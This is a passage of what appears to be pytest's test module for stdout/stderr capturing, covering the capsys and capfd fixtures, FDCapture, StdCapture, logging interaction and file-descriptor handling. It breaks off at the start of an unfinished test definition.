def test_capturing_bytes_in_utf8_encoding(testdir, method):
    # Escaped byte sequences in printed output must survive capture.
    testdir.makepyfile("""
        def test_unicode():
            print ('b\\u00f6y')
    """)
    result = testdir.runpytest("--capture=%s" % method)
    result.stdout.fnmatch_lines([
        "*1 passed*"
    ])


def test_collect_capturing(testdir):
    """Output emitted at collection (import) time is captured and reported."""
    failing_module = testdir.makepyfile("""
        print ("collect %s failure" % 13)
        import xyz42123
    """)
    run_result = testdir.runpytest(failing_module)
    run_result.stdout.fnmatch_lines(
        ["*Captured stdout*",
         "*collect 13 failure*"])


class TestPerTestCapturing(object):
    """Capturing is scoped per test: each report shows only its own output."""

    def test_capture_and_fixtures(self, testdir):
        """Setup-time output is attached to each failing test's report."""
        p = testdir.makepyfile("""
            def setup_module(mod):
                print ("setup module")
            def setup_function(function):
                print ("setup " + function.__name__)
            def test_func1():
                print ("in func1")
                assert 0
            def test_func2():
                print ("in func2")
                assert 0
        """)
        result = testdir.runpytest(p)
        result.stdout.fnmatch_lines([
            "setup module*",
            "setup test_func1*",
            "in func1*",
            "setup test_func2*",
            "in func2*",
        ])

    @pytest.mark.xfail(reason="unimplemented feature")
    def test_capture_scope_cache(self, testdir):
        """Setup and call output would ideally be reported separately."""
        p = testdir.makepyfile("""
            import sys
            def setup_module(func):
                print ("module-setup")
            def setup_function(func):
                print ("function-setup")
            def test_func():
                print ("in function")
                assert 0
            def teardown_function(func):
                print ("in teardown")
        """)
        result = testdir.runpytest(p)
        result.stdout.fnmatch_lines([
            "*test_func():*",
            "*Captured stdout during setup*",
            "module-setup*",
            "function-setup*",
            "*Captured stdout*",
            "in teardown*",
        ])

    def test_no_carry_over(self, testdir):
        """Output of a passing test must not show up in a later failure."""
        p = testdir.makepyfile("""
            def test_func1():
                print ("in func1")
            def test_func2():
                print ("in func2")
                assert 0
        """)
        result = testdir.runpytest(p)
        s = result.stdout.str()
        assert "in func1" not in s
        assert "in func2" in s

    def test_teardown_capturing(self, testdir):
        """A failure in teardown reports output from setup, call and teardown."""
        p = testdir.makepyfile("""
            def setup_function(function):
                print ("setup func1")
            def teardown_function(function):
                print ("teardown func1")
                assert 0
            def test_func1():
                print ("in func1")
                pass
        """)
        result = testdir.runpytest(p)
        result.stdout.fnmatch_lines([
            '*teardown_function*',
            '*Captured stdout*',
            "setup func1*",
            "in func1*",
            "teardown func1*",
            # "*1 fixture failure*"
        ])

    def test_teardown_capturing_final(self, testdir):
        """A failing module teardown still gets its output reported."""
        p = testdir.makepyfile("""
            def teardown_module(mod):
                print ("teardown module")
                assert 0
            def test_func():
                pass
        """)
        result = testdir.runpytest(p)
        result.stdout.fnmatch_lines([
            "*def teardown_module(mod):*",
            "*Captured stdout*",
            "*teardown module*",
            "*1 error*",
        ])

    def test_capturing_outerr(self, testdir):
        """stdout and stderr are captured separately and shown per section."""
        p1 = testdir.makepyfile("""
            import sys
            def test_capturing():
                print (42)
                sys.stderr.write(str(23))
            def test_capturing_error():
                print (1)
                sys.stderr.write(str(2))
                raise ValueError
        """)
        result = testdir.runpytest(p1)
        result.stdout.fnmatch_lines([
            "*test_capturing_outerr.py .F*",
            "====* FAILURES *====",
            "____*____",
            "*test_capturing_outerr.py:8: ValueError",
            "*--- Captured stdout *call*",
            "1",
            "*--- Captured stderr *call*",
            "2",
        ])


class TestLoggingInteraction(object):
    """Interaction between stdlib logging and pytest's capturing."""

    def test_logging_stream_ownership(self, testdir):
        """Closing a logging stream must not trigger atexit errors."""
        p = testdir.makepyfile("""
            def test_logging():
                import logging
                import pytest
                stream = capture.CaptureIO()
                logging.basicConfig(stream=stream)
                stream.close() # to free memory/release resources
        """)
        result = testdir.runpytest_subprocess(p)
        assert result.stderr.str().find("atexit") == -1

    def test_logging_and_immediate_setupteardown(self, testdir):
        """Logging from function setup/call/teardown is reported per phase."""
        p = testdir.makepyfile("""
            import logging
            def setup_function(function):
                logging.warn("hello1")

            def test_logging():
                logging.warn("hello2")
                assert 0

            def teardown_function(function):
                logging.warn("hello3")
                assert 0
        """)
        # exercise both sys and fd level capturing
        for optargs in (('--capture=sys',), ('--capture=fd',)):
            print(optargs)
            result = testdir.runpytest_subprocess(p, *optargs)
            s = result.stdout.str()
            result.stdout.fnmatch_lines([
                "*WARN*hello3",  # errors show first!
                "*WARN*hello1",
                "*WARN*hello2",
            ])
            # verify proper termination
            assert "closed" not in s

    def test_logging_and_crossscope_fixtures(self, testdir):
        """Same as above but with module-scoped setup/teardown."""
        p = testdir.makepyfile("""
            import logging
            def setup_module(function):
                logging.warn("hello1")

            def test_logging():
                logging.warn("hello2")
                assert 0

            def teardown_module(function):
                logging.warn("hello3")
                assert 0
        """)
        for optargs in (('--capture=sys',), ('--capture=fd',)):
            print(optargs)
            result = testdir.runpytest_subprocess(p, *optargs)
            s = result.stdout.str()
            result.stdout.fnmatch_lines([
                "*WARN*hello3",  # errors come first
                "*WARN*hello1",
                "*WARN*hello2",
            ])
            # verify proper termination
            assert "closed" not in s

    def test_conftestlogging_is_shown(self, testdir):
        """Logging from a conftest at import time reaches stderr with -s."""
        testdir.makeconftest("""
                import logging
                logging.basicConfig()
                logging.warn("hello435")
        """)
        # make sure that logging is still captured in tests
        result = testdir.runpytest_subprocess("-s", "-p", "no:capturelog")
        assert result.ret == EXIT_NOTESTSCOLLECTED
        result.stderr.fnmatch_lines([
            "WARNING*hello435*",
        ])
        assert 'operation on closed file' not in result.stderr.str()

    def test_conftestlogging_and_test_logging(self, testdir):
        """Logging configured in conftest is still captured inside tests."""
        testdir.makeconftest("""
                import logging
                logging.basicConfig()
        """)
        # make sure that logging is still captured in tests
        p = testdir.makepyfile("""
            def test_hello():
                import logging
                logging.warn("hello433")
                assert 0
        """)
        result = testdir.runpytest_subprocess(p, "-p", "no:capturelog")
        assert result.ret != 0
        result.stdout.fnmatch_lines([
            "WARNING*hello433*",
        ])
        assert 'something' not in result.stderr.str()
        assert 'operation on closed file' not in result.stderr.str()


class TestCaptureFixture(object):
    """Tests for the capsys/capfd/capsysbinary/capfdbinary fixtures."""

    @pytest.mark.parametrize("opt", [[], ["-s"]])
    def test_std_functional(self, testdir, opt):
        """capsys.readouterr() works with and without the -s option."""
        reprec = testdir.inline_runsource("""
            def test_hello(capsys):
                print (42)
                out, err = capsys.readouterr()
                assert out.startswith("42")
        """, *opt)
        reprec.assertoutcome(passed=1)

    def test_capsyscapfd(self, testdir):
        """Requesting capsys and capfd together is a setup error, both orders."""
        p = testdir.makepyfile("""
            def test_one(capsys, capfd):
                pass
            def test_two(capfd, capsys):
                pass
        """)
        result = testdir.runpytest(p)
        result.stdout.fnmatch_lines([
            "*ERROR*setup*test_one*",
            "E*capfd*capsys*same*time*",
            "*ERROR*setup*test_two*",
            "E*capsys*capfd*same*time*",
            "*2 error*"])

    def test_capturing_getfixturevalue(self, testdir):
        """Test that asking for "capfd" and "capsys" using request.getfixturevalue
        in the same test is an error.
        """
        testdir.makepyfile("""
            def test_one(capsys, request):
                request.getfixturevalue("capfd")
            def test_two(capfd, request):
                request.getfixturevalue("capsys")
        """)
        result = testdir.runpytest()
        result.stdout.fnmatch_lines([
            "*test_one*",
            "*capsys*capfd*same*time*",
            "*test_two*",
            "*capfd*capsys*same*time*",
            "*2 failed in*",
        ])

    def test_capsyscapfdbinary(self, testdir):
        """capsys together with capfdbinary is also rejected."""
        p = testdir.makepyfile("""
            def test_one(capsys, capfdbinary):
                pass
        """)
        result = testdir.runpytest(p)
        result.stdout.fnmatch_lines([
            "*ERROR*setup*test_one*",
            "E*capfdbinary*capsys*same*time*",
            "*1 error*"])

    @pytest.mark.parametrize("method", ["sys", "fd"])
    def test_capture_is_represented_on_failure_issue128(self, testdir, method):
        """Captured output shows up in the failure report (#128)."""
        p = testdir.makepyfile("""
            def test_hello(cap%s):
                print ("xxx42xxx")
                assert 0
        """ % method)
        result = testdir.runpytest(p)
        result.stdout.fnmatch_lines([
            "xxx42xxx",
        ])

    @needsosdup
    def test_stdfd_functional(self, testdir):
        """capfd captures raw os.write output to fd 1."""
        reprec = testdir.inline_runsource("""
            def test_hello(capfd):
                import os
                os.write(1, "42".encode('ascii'))
                out, err = capfd.readouterr()
                assert out.startswith("42")
                capfd.close()
        """)
        reprec.assertoutcome(passed=1)

    @needsosdup
    def test_capfdbinary(self, testdir):
        """capfdbinary returns the captured fd output as raw bytes."""
        reprec = testdir.inline_runsource("""
            def test_hello(capfdbinary):
                import os
                # some likely un-decodable bytes
                os.write(1, b'\\xfe\\x98\\x20')
                out, err = capfdbinary.readouterr()
                assert out == b'\\xfe\\x98\\x20'
                assert err == b''
        """)
        reprec.assertoutcome(passed=1)

    @pytest.mark.skipif(
        sys.version_info < (3,),
        reason='only have capsysbinary in python 3',
    )
    def test_capsysbinary(self, testdir):
        """capsysbinary returns captured sys-level output as raw bytes."""
        reprec = testdir.inline_runsource("""
            def test_hello(capsysbinary):
                import sys
                # some likely un-decodable bytes
                sys.stdout.buffer.write(b'\\xfe\\x98\\x20')
                out, err = capsysbinary.readouterr()
                assert out == b'\\xfe\\x98\\x20'
                assert err == b''
        """)
        reprec.assertoutcome(passed=1)

    @pytest.mark.skipif(
        sys.version_info >= (3,),
        reason='only have capsysbinary in python 3',
    )
    def test_capsysbinary_forbidden_in_python2(self, testdir):
        """Requesting capsysbinary on python 2 produces a clear error."""
        testdir.makepyfile("""
            def test_hello(capsysbinary):
                pass
        """)
        result = testdir.runpytest()
        result.stdout.fnmatch_lines([
            "*test_hello*",
            "*capsysbinary is only supported on python 3*",
            "*1 error in*",
        ])

    def test_partial_setup_failure(self, testdir):
        """A missing fixture alongside capsys still reports a setup error."""
        p = testdir.makepyfile("""
            def test_hello(capsys, missingarg):
                pass
        """)
        result = testdir.runpytest(p)
        result.stdout.fnmatch_lines([
            "*test_partial_setup_failure*",
            "*1 error*",
        ])

    @needsosdup
    def test_keyboardinterrupt_disables_capturing(self, testdir):
        """KeyboardInterrupt suspends capturing so the message is visible."""
        p = testdir.makepyfile("""
            def test_hello(capfd):
                import os
                os.write(1, str(42).encode('ascii'))
                raise KeyboardInterrupt()
        """)
        result = testdir.runpytest_subprocess(p)
        result.stdout.fnmatch_lines([
            "*KeyboardInterrupt*"
        ])
        # exit code 2 == interrupted
        assert result.ret == 2

    @pytest.mark.issue14
    def test_capture_and_logging(self, testdir):
        """logging plus capsys must not leave closed-file errors behind."""
        p = testdir.makepyfile("""
            import logging
            def test_log(capsys):
                logging.error('x')
            """)
        result = testdir.runpytest_subprocess(p)
        assert 'closed' not in result.stderr.str()

    @pytest.mark.parametrize('fixture', ['capsys', 'capfd'])
    @pytest.mark.parametrize('no_capture', [True, False])
    def test_disabled_capture_fixture(self, testdir, fixture, no_capture):
        """The fixture's disabled() context lets output through temporarily."""
        testdir.makepyfile("""
            def test_disabled({fixture}):
                print('captured before')
                with {fixture}.disabled():
                    print('while capture is disabled')
                print('captured after')
                assert {fixture}.readouterr() == ('captured before\\ncaptured after\\n', '')

            def test_normal():
                print('test_normal executed')
        """.format(fixture=fixture))
        args = ('-s',) if no_capture else ()
        result = testdir.runpytest_subprocess(*args)
        result.stdout.fnmatch_lines("""
            *while capture is disabled*
        """)
        assert 'captured before' not in result.stdout.str()
        assert 'captured after' not in result.stdout.str()
        if no_capture:
            assert 'test_normal executed' in result.stdout.str()
        else:
            assert 'test_normal executed' not in result.stdout.str()

    @pytest.mark.parametrize('fixture', ['capsys', 'capfd'])
    def test_fixture_use_by_other_fixtures(self, testdir, fixture):
        """
        Ensure that capsys and capfd can be used by other fixtures during setup and teardown.
        """
        testdir.makepyfile("""
            from __future__ import print_function
            import sys
            import pytest

            @pytest.fixture
            def captured_print({fixture}):
                print('stdout contents begin')
                print('stderr contents begin', file=sys.stderr)
                out, err = {fixture}.readouterr()

                yield out, err

                print('stdout contents end')
                print('stderr contents end', file=sys.stderr)
                out, err = {fixture}.readouterr()
                assert out == 'stdout contents end\\n'
                assert err == 'stderr contents end\\n'

            def test_captured_print(captured_print):
                out, err = captured_print
                assert out == 'stdout contents begin\\n'
                assert err == 'stderr contents begin\\n'
        """.format(fixture=fixture))
        result = testdir.runpytest_subprocess()
        result.stdout.fnmatch_lines("*1 passed*")
        assert 'stdout contents begin' not in result.stdout.str()
        assert 'stderr contents begin' not in result.stdout.str()


def test_setup_failure_does_not_kill_capturing(testdir):
    """A crash in pytest_runtest_setup is still reported through capture."""
    pkg = testdir.mkpydir("sub1")
    pkg.join("conftest.py").write(_pytest._code.Source("""
        def pytest_runtest_setup(item):
            raise ValueError(42)
    """))
    pkg.join("test_mod.py").write("def test_func1(): pass")
    run_result = testdir.runpytest(testdir.tmpdir, '--traceconfig')
    run_result.stdout.fnmatch_lines(
        ["*ValueError(42)*",
         "*1 error*"])


def test_fdfuncarg_skips_on_no_osdup(testdir):
    """The capfd fixture skips the test when os.dup is unavailable."""
    testdir.makepyfile("""
        import os
        if hasattr(os, 'dup'):
            del os.dup
        def test_hello(capfd):
            pass
    """)
    run_result = testdir.runpytest_subprocess("--capture=no")
    run_result.stdout.fnmatch_lines(["*1 skipped*"])


def test_capture_conftest_runtest_setup(testdir):
    """Output printed from a conftest hook stays captured by default."""
    testdir.makeconftest("""
        def pytest_runtest_setup():
            print ("hello19")
    """)
    testdir.makepyfile("def test_func(): pass")
    run_result = testdir.runpytest()
    assert run_result.ret == 0
    assert 'hello19' not in run_result.stdout.str()


def test_capture_badoutput_issue412(testdir):
    """Undecodable bytes written to fd 1 must not break reporting (#412)."""
    testdir.makepyfile("""
        import os

        def test_func():
            omg = bytearray([1,129,1])
            os.write(1, omg)
            assert 0
        """)
    run_result = testdir.runpytest('--cap=fd')
    run_result.stdout.fnmatch_lines('''
        *def test_func*
        *assert 0*
        *Captured*
        *1 failed*
    ''')


def test_capture_early_option_parsing(testdir):
    """-s combined with -v is honored during early option parsing."""
    testdir.makeconftest("""
        def pytest_runtest_setup():
            print ("hello19")
    """)
    testdir.makepyfile("def test_func(): pass")
    run_result = testdir.runpytest("-vs")
    assert run_result.ret == 0
    assert 'hello19' in run_result.stdout.str()


def test_capture_binary_output(testdir):
    """Binary (undecodable) bytes on fd 1 must not break capturing, whether
    emitted directly by a test or by a subprocess it launches.
    """
    testdir.makepyfile(r"""
        import pytest

        def test_a():
            import sys
            import subprocess
            subprocess.call([sys.executable, __file__])

        def test_foo():
            import os;os.write(1, b'\xc3')

        if __name__ == '__main__':
            test_foo()
        """)
    result = testdir.runpytest('--assert=plain')
    result.assert_outcomes(passed=2)


def test_error_during_readouterr(testdir):
    """Make sure we suspend capturing if errors occur during readouterr"""
    # Break FDCapture.snap via a plugin module loaded with -p so the error
    # happens while pytest itself is reading captured output.
    testdir.makepyfile(pytest_xyz="""
        from _pytest.capture import FDCapture
        def bad_snap(self):
            raise Exception('boom')
        assert FDCapture.snap
        FDCapture.snap = bad_snap
    """)
    result = testdir.runpytest_subprocess(
        "-p", "pytest_xyz", "--version", syspathinsert=True
    )
    # the traceback must reach the real stderr despite broken capturing
    result.stderr.fnmatch_lines([
        "*in bad_snap",
        "    raise Exception('boom')",
        "Exception: boom",
    ])


class TestCaptureIO(object):
    """Behaviour of the in-memory text stream used for sys-level capturing."""

    def test_text(self):
        """Plain text writes round-trip through getvalue()."""
        f = capture.CaptureIO()
        f.write("hello")
        s = f.getvalue()
        assert s == "hello"
        f.close()

    def test_unicode_and_str_mixture(self):
        """py3 rejects byte writes; py2 coerces mixed writes to unicode."""
        f = capture.CaptureIO()
        if sys.version_info >= (3, 0):
            f.write("\u00f6")
            pytest.raises(TypeError, "f.write(bytes('hello', 'UTF-8'))")
        else:
            f.write(unicode("\u00f6", 'UTF-8'))
            f.write("hello")  # bytes
            s = f.getvalue()
            f.close()
            assert isinstance(s, unicode)

    @pytest.mark.skipif(
        sys.version_info[0] == 2,
        reason='python 3 only behaviour',
    )
    def test_write_bytes_to_buffer(self):
        """In python3, stdout / stderr are text io wrappers (exposing a buffer
        property of the underlying bytestream).  See issue #1407
        """
        f = capture.CaptureIO()
        f.buffer.write(b'foo\r\n')
        assert f.getvalue() == 'foo\r\n'


def test_bytes_io():
    """A BytesIO accepts bytes, rejects text, and round-trips its content."""
    # NOTE: the raises() argument is an eval'd string referencing the local
    # name ``f``, so that name must stay as-is.
    f = py.io.BytesIO()
    data = tobytes("hello")
    f.write(data)
    pytest.raises(TypeError, "f.write(totext('hello'))")
    assert f.getvalue() == data


def test_dontreadfrominput():
    """The stdin replacement refuses every read-style operation."""
    from _pytest.capture import DontReadFromInput
    dummy_stdin = DontReadFromInput()
    assert not dummy_stdin.isatty()
    pytest.raises(IOError, dummy_stdin.read)
    pytest.raises(IOError, dummy_stdin.readlines)
    pytest.raises(IOError, iter, dummy_stdin)
    pytest.raises(UnsupportedOperation, dummy_stdin.fileno)
    dummy_stdin.close()  # just for completeness


@pytest.mark.skipif('sys.version_info < (3,)', reason='python2 has no buffer')
def test_dontreadfrominput_buffer_python3():
    """On python3 the .buffer attribute is equally read-hostile."""
    from _pytest.capture import DontReadFromInput
    dummy_stdin = DontReadFromInput()
    binary_view = dummy_stdin.buffer
    assert not binary_view.isatty()
    pytest.raises(IOError, binary_view.read)
    pytest.raises(IOError, binary_view.readlines)
    pytest.raises(IOError, iter, binary_view)
    pytest.raises(ValueError, binary_view.fileno)
    dummy_stdin.close()  # just for completeness


@pytest.mark.skipif('sys.version_info >= (3,)', reason='python2 has no buffer')
def test_dontreadfrominput_buffer_python2():
    """On python2 accessing .buffer raises AttributeError."""
    from _pytest.capture import DontReadFromInput
    dummy_stdin = DontReadFromInput()
    with pytest.raises(AttributeError):
        dummy_stdin.buffer
    dummy_stdin.close()  # just for completeness


@pytest.yield_fixture
def tmpfile(testdir):
    """Yield a fresh binary read/write file object, closing it afterwards."""
    fileobj = testdir.makepyfile("").open('wb+')
    yield fileobj
    # teardown runs only on normal completion, matching fixture semantics
    if not fileobj.closed:
        fileobj.close()


@needsosdup
def test_dupfile(tmpfile):
    """safe_text_dupfile returns distinct wrappers whose .name reflects the
    open/closed state of the underlying buffer, all writing to one target."""
    dup_files = []
    for idx in range(5):
        duplicate = capture.safe_text_dupfile(tmpfile, "wb")
        assert duplicate != tmpfile
        assert duplicate.fileno() != tmpfile.fileno()
        assert duplicate not in dup_files
        print(idx, end="", file=duplicate)
        dup_files.append(duplicate)

    fname_open = dup_files[0].name
    assert fname_open == repr(dup_files[0].buffer)

    for duplicate in dup_files:
        duplicate.close()
    fname_closed = dup_files[0].name
    assert fname_closed == repr(dup_files[0].buffer)
    assert fname_closed != fname_open
    tmpfile.seek(0)
    contents = tmpfile.read()
    assert "01234" in repr(contents)
    tmpfile.close()
    assert fname_closed == repr(dup_files[0].buffer)


def test_dupfile_on_bytesio():
    """Duplicating a BytesIO yields a text wrapper writing through to it."""
    underlying = py.io.BytesIO()
    wrapper = capture.safe_text_dupfile(underlying, "wb")
    wrapper.write("hello")
    assert underlying.getvalue() == b"hello"
    assert 'BytesIO object' in wrapper.name


def test_dupfile_on_textio():
    """Duplicating a TextIO writes through and exposes no name attribute."""
    underlying = py.io.TextIO()
    wrapper = capture.safe_text_dupfile(underlying, "wb")
    wrapper.write("hello")
    assert underlying.getvalue() == "hello"
    assert not hasattr(wrapper, 'name')


@contextlib.contextmanager
def lsof_check():
    """Assert that the wrapped block does not leak open regular files.

    Snapshots ``lsof`` output before and after the block and compares the
    number of REG (regular file) lines; skips when lsof cannot be run.
    """
    pid = os.getpid()
    try:
        before = py.process.cmdexec("lsof -p %d" % pid)
    except (py.process.cmdexec.Error, UnicodeDecodeError):
        # about UnicodeDecodeError, see note on pytester
        pytest.skip("could not run 'lsof'")
    yield
    after = py.process.cmdexec("lsof -p %d" % pid)

    def _count_reg(text):
        # number of open regular files reported by lsof
        return len([line for line in text.split("\n") if "REG" in line])

    assert _count_reg(after) < _count_reg(before) + 3, after


class TestFDCapture(object):
    """Direct tests of the low-level FDCapture primitive."""

    pytestmark = needsosdup

    def test_simple(self, tmpfile):
        """Writes are only captured between start() and snap()."""
        fd = tmpfile.fileno()
        cap = capture.FDCapture(fd)
        data = tobytes("hello")
        os.write(fd, data)
        s = cap.snap()
        cap.done()
        # capture was never started, so nothing was recorded
        assert not s
        cap = capture.FDCapture(fd)
        cap.start()
        os.write(fd, data)
        s = cap.snap()
        cap.done()
        assert s == "hello"

    def test_simple_many(self, tmpfile):
        """Repeated capture cycles on the same fd keep working."""
        for i in range(10):
            self.test_simple(tmpfile)

    def test_simple_many_check_open_files(self, testdir):
        """Repeated cycles must not leak open files (checked via lsof)."""
        with lsof_check():
            with testdir.makepyfile("").open('wb+') as tmpfile:
                self.test_simple_many(tmpfile)

    def test_simple_fail_second_start(self, tmpfile):
        """start() after done() is invalid and raises ValueError."""
        fd = tmpfile.fileno()
        cap = capture.FDCapture(fd)
        cap.done()
        pytest.raises(ValueError, cap.start)

    def test_stderr(self):
        """Capturing fd 2 records output printed to sys.stderr."""
        cap = capture.FDCapture(2)
        cap.start()
        print("hello", file=sys.stderr)
        s = cap.snap()
        cap.done()
        assert s == "hello\n"

    def test_stdin(self, tmpfile):
        """While fd 0 is captured, reading from it returns no data."""
        cap = capture.FDCapture(0)
        cap.start()
        x = os.read(0, 100).strip()
        cap.done()
        assert x == tobytes('')

    def test_writeorg(self, tmpfile):
        """writeorg() bypasses capturing and writes to the original file."""
        data1, data2 = tobytes("foo"), tobytes("bar")
        cap = capture.FDCapture(tmpfile.fileno())
        cap.start()
        tmpfile.write(data1)
        tmpfile.flush()
        cap.writeorg(data2)
        scap = cap.snap()
        cap.done()
        # the regular write was captured; the original file received data2
        assert scap == totext(data1)
        with open(tmpfile.name, 'rb') as stmp_file:
            stmp = stmp_file.read()
            assert stmp == data2

    def test_simple_resume_suspend(self, tmpfile):
        """suspend()/resume() toggle capturing; suspend after done() fails."""
        with saved_fd(1):
            cap = capture.FDCapture(1)
            cap.start()
            data = tobytes("hello")
            os.write(1, data)
            sys.stdout.write("whatever")
            s = cap.snap()
            assert s == "hellowhatever"
            cap.suspend()
            # while suspended, writes go to the real fd, not the capture
            os.write(1, tobytes("world"))
            sys.stdout.write("qlwkej")
            assert not cap.snap()
            cap.resume()
            os.write(1, tobytes("but now"))
            sys.stdout.write(" yes\n")
            s = cap.snap()
            assert s == "but now yes\n"
            cap.suspend()
            cap.done()
            pytest.raises(AttributeError, cap.suspend)


@contextlib.contextmanager
def saved_fd(fd):
    """Preserve file descriptor ``fd`` and restore it when the block exits."""
    backup = os.dup(fd)
    try:
        yield
    finally:
        # point fd back at its original target even if the block raised
        os.dup2(backup, fd)
        os.close(backup)


class TestStdCapture(object):
    """Tests of MultiCapture at the sys.stdout/stderr level."""

    # subclasses override this to run the same suite against other
    # capture implementations (see TestStdCaptureFD)
    captureclass = staticmethod(StdCapture)

    @contextlib.contextmanager
    def getcapture(self, **kw):
        """Start a capture of the configured class; stop it on exit."""
        cap = self.__class__.captureclass(**kw)
        cap.start_capturing()
        try:
            yield cap
        finally:
            cap.stop_capturing()

    def test_capturing_done_simple(self):
        """stdout and stderr writes are recorded separately."""
        with self.getcapture() as cap:
            sys.stdout.write("hello")
            sys.stderr.write("world")
            out, err = cap.readouterr()
        assert out == "hello"
        assert err == "world"

    def test_capturing_reset_simple(self):
        """print() output and stderr writes are both captured."""
        with self.getcapture() as cap:
            print("hello world")
            sys.stderr.write("hello error\n")
            out, err = cap.readouterr()
        assert out == "hello world\n"
        assert err == "hello error\n"

    def test_capturing_readouterr(self):
        """readouterr() drains the buffers, so a second call only returns
        output produced since the first."""
        with self.getcapture() as cap:
            print("hello world")
            sys.stderr.write("hello error\n")
            out, err = cap.readouterr()
            assert out == "hello world\n"
            assert err == "hello error\n"
            sys.stderr.write("error2")
            out, err = cap.readouterr()
        assert err == "error2"

    def test_capture_results_accessible_by_attribute(self):
        """The readouterr() result exposes .out and .err attributes."""
        with self.getcapture() as cap:
            sys.stdout.write("hello")
            sys.stderr.write("world")
            capture_result = cap.readouterr()
        assert capture_result.out == "hello"
        assert capture_result.err == "world"

    def test_capturing_readouterr_unicode(self):
        """Non-ascii output is decoded to text."""
        with self.getcapture() as cap:
            print("hx\xc4\x85\xc4\x87")
            out, err = cap.readouterr()
        assert out == py.builtin._totext("hx\xc4\x85\xc4\x87\n", "utf8")

    @pytest.mark.skipif('sys.version_info >= (3,)',
                        reason='text output different for bytes on python3')
    def test_capturing_readouterr_decode_error_handling(self):
        """Undecodable bytes are replaced instead of raising."""
        with self.getcapture() as cap:
            # triggered a internal error in pytest
            print('\xa6')
            out, err = cap.readouterr()
        assert out == py.builtin._totext('\ufffd\n', 'unicode-escape')

    def test_reset_twice_error(self):
        """Stopping an already-stopped capture raises ValueError."""
        with self.getcapture() as cap:
            print("hello")
            out, err = cap.readouterr()
        pytest.raises(ValueError, cap.stop_capturing)
        assert out == "hello\n"
        assert not err

    def test_capturing_modify_sysouterr_in_between(self):
        """Reassigning sys.stdout/stderr mid-capture is tolerated and the
        originals are restored afterwards."""
        oldout = sys.stdout
        olderr = sys.stderr
        with self.getcapture() as cap:
            sys.stdout.write("hello")
            sys.stderr.write("world")
            sys.stdout = capture.CaptureIO()
            sys.stderr = capture.CaptureIO()
            print("not seen")
            sys.stderr.write("not seen\n")
            out, err = cap.readouterr()
        assert out == "hello"
        assert err == "world"
        assert sys.stdout == oldout
        assert sys.stderr == olderr

    def test_capturing_error_recursive(self):
        """Nested captures each record only their own output."""
        with self.getcapture() as cap1:
            print("cap1")
            with self.getcapture() as cap2:
                print("cap2")
                out2, err2 = cap2.readouterr()
                out1, err1 = cap1.readouterr()
        assert out1 == "cap1\n"
        assert out2 == "cap2\n"

    def test_just_out_capture(self):
        """out=True/err=False captures stdout only."""
        with self.getcapture(out=True, err=False) as cap:
            sys.stdout.write("hello")
            sys.stderr.write("world")
            out, err = cap.readouterr()
        assert out == "hello"
        assert not err

    def test_just_err_capture(self):
        """out=False/err=True captures stderr only."""
        with self.getcapture(out=False, err=True) as cap:
            sys.stdout.write("hello")
            sys.stderr.write("world")
            out, err = cap.readouterr()
        assert err == "world"
        assert not out

    def test_stdin_restored(self):
        """in_=True swaps sys.stdin during capture and restores it after."""
        old = sys.stdin
        with self.getcapture(in_=True):
            newstdin = sys.stdin
        assert newstdin != sys.stdin
        assert sys.stdin is old

    def test_stdin_nulled_by_default(self):
        """Reading from the replaced stdin raises instead of blocking."""
        print("XXX this test may well hang instead of crashing")
        print("XXX which indicates an error in the underlying capturing")
        print("XXX mechanisms")
        with self.getcapture():
            pytest.raises(IOError, "sys.stdin.read()")


class TestStdCaptureFD(TestStdCapture):
    """Re-run the TestStdCapture suite with file-descriptor level capturing."""

    pytestmark = needsosdup
    # overrides the base class: capture at the OS fd level instead of sys.*
    captureclass = staticmethod(StdCaptureFD)

    def test_simple_only_fd(self, testdir):
        """Raw os.write to fd 1 is captured and shown for a failing test."""
        testdir.makepyfile("""
            import os
            def test_x():
                os.write(1, "hello\\n".encode("ascii"))
                assert 0
        """)
        result = testdir.runpytest_subprocess()
        result.stdout.fnmatch_lines("""
            *test_x*
            *assert 0*
            *Captured stdout*
        """)

    def test_intermingling(self):
        """fd-level and sys-level writes appear in write order after flushes."""
        with self.getcapture() as cap:
            oswritebytes(1, "1")
            sys.stdout.write(str(2))
            sys.stdout.flush()
            oswritebytes(1, "3")
            oswritebytes(2, "a")
            sys.stderr.write("b")
            sys.stderr.flush()
            oswritebytes(2, "c")
            out, err = cap.readouterr()
        assert out == "123"
        assert err == "abc"

    def test_many(self, capfd):
        """Repeated capture construction/teardown must not leak fds."""
        with lsof_check():
            for i in range(10):
                cap = StdCaptureFD()
                cap.stop_capturing()


class TestStdCaptureFDinvalidFD(object):
    """FD capturing must cope with std file descriptors that were closed."""

    pytestmark = needsosdup

    def test_stdcapture_fd_invalid_fd(self, testdir):
        """Capturing starts and stops cleanly even when fd 0/1/2 is closed."""
        testdir.makepyfile("""
            import os
            from _pytest import capture
            def StdCaptureFD(out=True, err=True, in_=True):
                return capture.MultiCapture(out, err, in_,
                                              Capture=capture.FDCapture)
            def test_stdout():
                os.close(1)
                cap = StdCaptureFD(out=True, err=False, in_=False)
                cap.stop_capturing()
            def test_stderr():
                os.close(2)
                cap = StdCaptureFD(out=False, err=True, in_=False)
                cap.stop_capturing()
            def test_stdin():
                os.close(0)
                cap = StdCaptureFD(out=False, err=False, in_=True)
                cap.stop_capturing()
        """)
        result = testdir.runpytest_subprocess("--capture=fd")
        assert result.ret == 0
        assert result.parseoutcomes()['passed'] == 3


def test_capture_not_started_but_reset():
    """stop_capturing() on a never-started capture must not blow up."""
    unstarted = StdCapture()
    unstarted.stop_capturing()


def test_using_capsys_fixture_works_with_sys_stdout_encoding(capsys):
    """Printing an encoded (bytes) value under capsys works and is captured."""
    sample = 'test text'
    print(sample.encode(sys.stdout.encoding, 'replace'))
    captured_out, captured_err = capsys.readouterr()
    assert captured_out
    assert captured_err == ''


def test_capsys_results_accessible_by_attribute(capsys):
    """readouterr() must expose captured text via .out and .err attributes."""
    sys.stdout.write("spam")
    sys.stderr.write("eggs")
    snapshot = capsys.readouterr()
    assert snapshot.out == "spam"
    assert snapshot.err == "eggs"


@needsosdup
@pytest.mark.parametrize('use', [True, False])
def test_fdcapture_tmpfile_remains_the_same(tmpfile, use):
    """readouterr() must reuse the capture's tmpfile, not replace it."""
    if not use:
        # Passing True makes StdCaptureFD allocate its own tmpfile instead
        # of the fixture-provided one.
        tmpfile = True
    cap = StdCaptureFD(out=False, err=tmpfile)
    try:
        cap.start_capturing()
        capfile = cap.err.tmpfile
        cap.readouterr()
    finally:
        cap.stop_capturing()
    capfile2 = cap.err.tmpfile
    assert capfile2 == capfile


@needsosdup
def test_close_and_capture_again(testdir):
